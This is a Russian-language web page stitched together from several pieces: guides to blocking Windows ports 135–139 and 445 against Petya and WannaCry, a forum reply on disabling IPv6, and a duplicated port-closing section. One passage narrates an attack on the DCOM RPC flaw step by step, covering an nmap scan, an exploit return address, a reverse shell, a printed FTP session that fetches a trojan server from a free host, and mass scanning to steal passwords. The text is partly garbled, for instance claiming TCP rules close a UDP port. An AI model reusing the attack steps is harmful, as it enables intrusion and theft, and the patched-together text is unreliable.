Для того чтобы запустить командную строку, необходимо:

Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135? (команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137? (команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138? (команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139? (команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445? (команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000?

Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.

Закрываем порты сторонними программами

Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.

По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.

Как работать с программой, закрывающей порты

Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему

Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.

Делаем выводы

Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.

Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.

Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

Вчера неизвестные устроили очередную массовую атаку с помощью вируса-шифровальщика. Эксперты заявили, что пострадали десятки крупных компаний на Украине и в России. Вирус-шифровальщик носит название Petya.A (вероятно, вирус назван в честь Петра Порошенко). Пишут, что если создать файл perfc (без расширения) и разместить его по адресу C:Windows, вирус обойдет вас стороной. Если ваш компьютер ушел в перезагрузку и начал «проверку диска», нужно его немедленно выключить. Загрузка с с LiveCD или USB-диска даст доступ к файлам. Еще один способ защиты: закрыть порты 1024–1035, 135 и 445. Как это сделать мы сейчас разберемся на примере Windows 10.

Шаг 1
Переходим в Брандмауэр Windows (лучше выбрать режим повышенной безопасности), выбираем вкладку «Дополнительные параметры ».
Выбираем вкладку «Правила для входящих подключений », потом действие «Создать правило » (в правой колонке).

tcp closed01

Шаг 2
Выбираем тип правила — «для Порта ». В следующем окне выбираем пункт «Протокол TCP », указываем порты, которые хотите закрыть. В нашем случае это «135, 445, 1024-1035 » (без кавычек).

tcp closed02

tcp closed03

Шаг 3
Выбираем пункт «Блокировать подключение », в следующем окне отмечаем все профили: Доменный, Частный, Публичный.

tcp closed04

tcp closed05

Шаг 4
Осталось придумать название для правила (чтобы в будущем его было легко найти). Можно указать описание правила.

tcp closed06

Если какие-то программы перестанут работать или станут работать неправильно, возможно, вы перекрыли порт, которые они используют. Нужно будет добавить для них исключение в брандмауэре.

tcp closed07

135 TCP-порт используется службами удалённого обслуживания (DHCP, DNS, WINS и т.д.) и в приложениях «клиент-сервер» Microsoft (например, Exchange).

445 TCP-порт используется в Microsoft Windows 2000 и поздних версий для прямого TCP/IP-доступа без использования NetBIOS (например, в Active Directory).

Оба сетевых вредителя проникали в операционную систему компьютера-жертвы через одну и ту же дверь — сетевые порты 445 или 139. Вслед за двумя крупными вирусами и более мелкие виды компьютерной заразы начали эксплуатировать Что же это за порты, которые сканируют все, кому не лень?

За что отвечают порты 445 и 139 в ОС Windows

Данные порты используются в системе Windows для совместной работы с файлами и принтерами. Первый порт отвечает за работу протокола Server Message Blocks (SMB), а через второй работает протокол Network Basic Input-Output System (NetBIOS). Оба протокола позволяют компьютерам под управлением Windows подключаться по сети к «расшаренным» папкам и принтерам поверх основных протоколов TCP и UDP.

Начиная с Windows 2000, совместная работа с файлами и принтерами по сети осуществляется в основном через порт 445 по прикладному протоколу SMB. Протокол NetBIOS использовался в более ранних версиях системы, работая через порты 137, 138 и 139, и данная возможность сохранилась в более поздних версиях системы в качестве атавизма.

2219636

Чем опасны открытые порты

445 и 139 представляет собой незаметную, но значимую уязвимость в Windows. Оставляя данные порты незащищенными, вы широко распахиваете дверь на свой жесткий диск для непрошеных гостей вроде вирусов, троянов, червей, а также для хакерских атак. А если ваш компьютер включен в локальную сеть, то риску заражения вредоносным программным обеспечением подвергаются все ее пользователи.

Фактически, вы открываете совместный доступ к своему жесткому диску любому, кто сумеет получить доступ к данным портам. При желании и умении злоумышленники могут просмотреть содержимое жесткого диска, а то и удалить данные, форматировать сам диск или зашифровать файлы. Именно это и делали вирусы WannaCry и Petya, эпидемия которых прокатилась по миру этим летом.

Таким образом, если вы заботитесь о безопасности своих данных, будет не лишним узнать, как закрыть порты 139 и 445 в Windows.

2219637

Выясняем, открыты ли порты

2217391

Как закрыть порты в Windows 10/8/7

Существует три основных метода, позволяющих закрыть порт 445 в Windows 10, 7 или 8. Они не сильно отличаются друг от друга в зависимости от версии системы и достаточно просты. Можно попробовать любой из них на выбор. Этими же способами можно закрыть и порт 139.

2215771

Закрываем порты через брандмауэр

Первый метод, позволяющий закрыть 445 порт в Windows, является наиболее простым и доступен практически любому пользователю.

Теперь возможность входящего соединения на порт 445 будет закрыта. Если необходимо, аналогичное правило можно создать и для порта 139.

Закрываем порты через командную строку

Второй метод включает в себя операции с командной строкой и больше подходит для продвинутых пользователей Windows.

В результате выполнения процедуры так же будет создано правило брандмауэра Windows для закрытия порта 445. Некоторые пользователи, впрочем, сообщают, что данный метод не работает на их машинах: при проверке порт остается в статусе “LISTENING”. В этом случае следует попробовать третий способ, который также достаточно прост.

Закрываем порты через реестр Windows

Блокировать соединения на порт 445 можно также путем внесения изменений в системный реестр. Использовать данный метод следует с осторожностью: реестр Windows является основной базой данных всей системы, и случайно допущенная ошибка может привести к непредсказуемым последствиям. Перед работой с реестром рекомендуется сделать резервную копию, например, с помощью программы CCleaner.

Этот способ является наиболее эффективным, если точно следовать приведенной выше инструкции. Следует отметить, что он относится только к порту 445.

Для того чтобы защита была эффективнее, после внесения изменений в реестр можно также отключить службу Windows Server. Для этого выполните следующее:

Приведенные выше методы (за исключением третьего) позволяют закрыть не только порт 445, но и порты 135, 137, 138, 139. Для этого при выполнении процедуры просто заменяйте номер порта на нужный.

Важно! Необходимо помнить, что порт 445 в Windows отвечает за совместный доступ к файлам, папкам и принтерам. Таким образом, если вы закроете данный порт, вы больше не сможете «расшарить» общую папку для других пользователей или распечатать документ по сети.

Если ваш компьютер включен в локальную сеть и данные функции необходимы вам для работы, следует воспользоваться сторонними средствами защиты. К примеру, активируйте сетевой экран вашего антивируса, который возьмет под контроль все порты и будет осуществлять их мониторинг на предмет несанкционированного доступа.

2217370

Выполняя приведенные выше рекомендации, можно обезопасить себя от незаметной, но серьезной уязвимости в Windows и защитить свои данные от многочисленных видов зловредного программного обеспечения, которое способно проникнуть в систему через порты 139 и 445.

Уязвимость была устрашающей, правда
готовый эксплоит оказался недоступен для
основной массы людей. Наверное поэтому
никто не чувствовал страха.

Группа польских экспертов в области
безопасности компьютерных технологий «Last
Stage of Delirium» сообщила публике о найденной
ими уязвимости, обработки DCOM объектов в
контексте RPC протокола. Это было чем-то
потрясающим, поскольку данный протокол
использовался практически всеми
существующими на этот момент версиями Windows.
Уязвимыми оказались ОС Windows NT, Windows XP, Windows 2000
и даже Windows Server 2003 был под прицелом. Этого
было более чем достаточно, чтобы завладеть
компьютерами большинства пользователей
сети Internet. Более того, многие серверы не
блокировали входящие пакеты на 135 порт,
именно он использовался для атаки. Что
делало их потенциальными жертвами.

Но спустя несколько часов Todd Sabin сообщает,
что уязвимыми являются все сервисы RPC. Это
значит, что настройка брандмауэра на
блокировку 135 порта является не достаточным
средством защиты. Опасности подвергаются
компьютеры с открытыми 135 (UDP/TCP), 139, 445 и 593
портами. СМИ освещают данную ошибку, как
потенциальную угрозу для безопасности
пользователей Windows. Дело шло к глобальной
катастрофе. Но поскольку публичного
эксплоита выпущено не было, все продолжали
жить своей прежней жизнью не задумываясь о
последствиях его появления в массах.

Но не все так пассивно отреагировали на
появление данной уязвимости. Хакеры
понемногу начинали писать приватные
эксплоиты, а script kids продолжали ждать его
появления. Результат не заставил себя долго
ждать. В течении нескольких дней появляются
некоторые наработки в этой области,
появляются первые эксплоиты. Тем не менее
большинство из них просто провоцирует сбой
на удаленной системе. Что можно объяснить,
поскольку технических деталей по поводу
найденной уязвимости известно не было. Хотя
некоторые версии ОС уже успешно
эксплуатировались.

Этот день стал переломным в истории
эксплуатации данной уязвимости. Наконец
появляется техническое описание проблемы.
После чего рождается большое количество
эксплоитов, под разные версии Windows.
Некоторые из них имеют даже графический
интерфейс, а иногда и функцию сканирования
определенного диапазона IP адресов.

Именно в этот момент началась массивная
атака хакеров на рядовых пользователей.
Более того, появился интернет червь MS Blast,
который с легкостью проникал на компьютеры
подключенные к Интернету и даже в
корпоративные сети крупнейших компаний
мира. В опасности оказались все.

Напасть на удаленную машину не составляет
особого труда. Поэтому script kids взялись за
свое дело. Кража кредитных кард и приватных
эксплоитов возросла в несколько раз. И
многие лакомые сегменты сети стали
пробоваться на вкус. Именно этим занялся
один хакер. Он давно хотел захватить сервер,
но приличной уязвимости под него до этого
не было. А не воспользоваться таким
подарком судьбы он просто не мог.

Первое, что пришлось ему сделать перед
атакой, это проверить какая именно
операционная система установлена на
сервере. Для этого он воспользовался
утилитой nmap. Хакер не раз уже писал о ее
возможностях, но я повторюсь и скажу, что
она используется для определения версии ОС
на удаленном компьютере. Благо она
существует как для Windows, так и для *nix. А
поскольку хакер для своей работы
использовал Windows, то его выбор пал на
графический вариант nmap.

Несколько минут работы сканера и
результат позитивный. 135 порт оказался
открытым и не защищенным брандмауэром. Это
было началом конца, началом долгожданной
атаки. На этот момент уже было написано
много эксплоитов, в том числе и «RCP Exploit GUI #2».
Его отличительной чертой было то, что он
имел графический интерфейс и содержал в
себе встроенные функции сканирования
диапазона IP, а также FTP сервер.

Запустив эксплоит, он указал адрес
целевого компьютера. Но в списке ОС для
атакуемых машин Windows NT указан не был. А ведь
именно она была установлена на сервере. Это
серьезная проблема, поскольку чтобы
запустить эксплоит необходимо знать его
точный адрес в памяти, чтобы потом передать
на него управление. Немного покопавшись в
файлах, скачанных вместе с эксплоитом он
нашел небольшой список адресов под широкую
разновидность линейки Windows. Среди них
присутствовал и Windows NT с предустановленным
Service Pack 4. Именно его значение он указал в
качестве адреса возврата, плюнув на ручной
выбор ОС. Число 0xE527F377 стало его тайным
пропуском в жизнь сервера. И он начал атаку.

Система сдалась без каких-либо
происшествий, так у хакера появился reverse-shell
с удаленным сервером. Теперь, когда он мог
исполнять на нем все что угодно, пришло
время установить Троян. Среди большого
числа возможных, был выбран DonaldDick. Для
осуществления своего плана ему пришлось
получить хостинг на бесплатном сервере с
поддержкой FTP. Вполне подошел BY.RU, именно
туда он и закачал сервер для трояна. Теперь,
когда DonaldDick стал доступным по FTP, он обратно
взялся за жертву, а точнее начал закачивать
на нее сервер трояна. Это был хорошо
продуманный план, поскольку уязвимость
могли пропатчить, а троян он и в Африке
троян. Набрав в консоли ftp он принялся
закачивать файл. Весь процесс занял у него,
написания всего лишь пяти строк:

open by.ru
имя_сервера.by.ru
пароль
get fooware.exe
bye

Где fooware.exe это переименованный сервер для
DonaldDick. Когда файл закачался, ему осталось
только запустить его. Для этого он просто
написал имя файла (fooware.exe) и с наслаждением
нажал Enter. После чего хакер получил удобный
контроль над сервером.

Но знаете как оно всегда бывает, когда
находишь что-то интересное продолжаешь с
этим играть. Так и наш Хакер захотел
получить более чем одну систему. Посмотрев,
что эксплоит позволяет провести массивное
сканирование, он взялся за работу, а точнее
за работу взялся KaHt. Его использование
оказалось не трудным. Так например, чтобы
про сканировать сеть с IP 192.168.0.* (класс С), ему
нужно было набрать «KaHt.exe 129.168.0.1
192.168.0.254″. Что собственно он и сделал,
после чего периодически проверял
результаты. Таким образом он получил доступ
к еще большему количеству пользователей, от
которых потом сумел получить пароли на
разные сервисы, почты, и много другой
полезной информации. Не говоря уже про то,
что он стал пользоваться многими из них как
анонимными прокси.

Пища к размышлению

Хотя Microsoft давно выпустила заплатку,
пользователи и админы не спешат
устанавливать патчи, надеясь что их сеть не
будет никому интересной. Но таких хакеров
большое количество и установка патча это
скорее необходимость, нежели возможность.
Еще можно блокировать все входящие пакеты
на 135, 139, 445 и 593 порты.

Естественно, что все это хакер делал через
анонимную прокси, а в результате почистил
за собой следы присутствия в системе. Но вам
следует задуматься, прежде чем повторять
его подвиги. Ведь такие действия считаются
противозаконными и могут закончиться для
вас достаточно плачевно.

Правила у вас вроде бы прописаны и должны работать.

Вы сканерами портов пробовали проверять? — ЦОБ (Центр Обеспечения Безопасности) (п.2.7)

И не забудьте о том, что ещё надо будет проверить IPv6, т.к. он у вас в системе включен, а вот сканеры обычно проверяют только IPv4 (я про централизованные сервисы).

Если данный протокол вам вообще не нужен, тогда его можно отключить:

Чтобы отключить компоненты IP версии 6 в Windows Vista, выполните указанные ниже действия.

1. Нажмите кнопку Пуск, введите regedit в поле Начать поиск, затем выберите regedit.exe в списке Программы.

2. В диалоговом окне Контроль учетных записей пользователей нажмите кнопку Продолжить.

3. Найдите и выберите следующий подраздел реестра:

4. Дважды щелкните пункт DisabledComponents для изменения параметра DisabledComponents.

Примечание. Если параметр DisabledComponents недоступен, его необходимо создать. Для этого выполните указанные ниже действия.

1. В меню Правка выберите пункт Создать, а затем — Параметр DWORD (32 бита).

2. Введите DisabledComponents и нажмите клавишу ВВОД.

3. Дважды щелкните пункт DisabledComponents.

5. Введите любое из указанных ниже значений для настройки протокола IP версии 6, а затем нажмите кнопку ОК.

1. Введите 0, чтобы включить все компоненты IP версии 6.

Примечание. Значение «0» используется по умолчанию.

2. Введите 0xffffffff, чтобы отключить все компоненты IP версии 6, кроме интерфейса замыкания на себя. При этом значении Windows Vista также будет использовать в политиках префиксов протокол IP версии 4 вместо IPv6.

3. Введите 0x20, чтобы использовать в политиках префикса IP версии 4 вместо IP версии 6.

4. Введите 0x10, чтобы отключить собственные интерфейсы IP версии 6.

5. Введите 0x01, чтобы отключить все туннельные интерфейсы IP версии 6.

6. Введите 0x11, чтобы отключить все интерфейсы IP версии 6, кроме интерфейса замыкания на себя.

* Использования других значений (кроме 0x0 или 0x20) может вызвать сбой в работе службы маршрутизации и удаленного доступа.

* Чтобы изменения вступили в силу, необходимо перезагрузить компьютер.

Информация в данной статье относится к следующим продуктам.

* Windows Vista Enterprise

* Windows Vista Enterprise 64-bit edition

* Windows Vista Home Basic 64-bit edition

* Windows Vista Home Premium 64-bit edition

* Windows Vista Ultimate 64-bit edition

* Windows Vista Business

* Windows Vista Business 64-bit edition

* Windows Vista Home Basic

* Windows Vista Home Premium

* Windows Vista Starter

* Windows Vista Ultimate

* Windows 7 Enterprise

* Windows 7 Home Basic

* Windows 7 Home Premium

* Windows 7 Professional

* Windows 7 Ultimate

* Windows Server 2008 R2 Datacenter

* Windows Server 2008 R2 Enterprise

* Windows Server 2008 R2 Standard

* Windows Server 2008 Datacenter

* Windows Server 2008 Enterprise

* Windows Server 2008 Standard

После отключения и перезагрузки у вас из списка, получаемого командой ipconfig /all исчезнет куча лишних строк и останутся только хорошо известные вам интерфейсы.

Обратное включение выполняется простым удалением созданного ключа из реестра или заменой значения на «0» с последующей перезагрузкой.

Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.

Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.

Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.

Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.

Какие порты у Windows 7-10 самые уязвимые?

Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:

Закрываем порты 135-139 и 445 в Виндовс

Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.

Используем командную строку

Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.

Для того чтобы запустить командную строку, необходимо:

Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135? (команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137? (команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138? (команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139? (команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445? (команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000?

Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.

Закрываем порты сторонними программами

Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.

По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.

Как работать с программой, закрывающей порты

Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему

Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.

Делаем выводы

Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.

Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.

Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

Источник

Like this post? Please share to your friends:
  • Журнал стабильности системы windows 10 как открыть
  • За сколько секунд загружается windows 10 с ssd
  • За сколько можно продать windows 7
  • Журнал событий системы windows 7 можно ли отключить
  • Журнал событий системы windows 10 ошибка форматирования флешки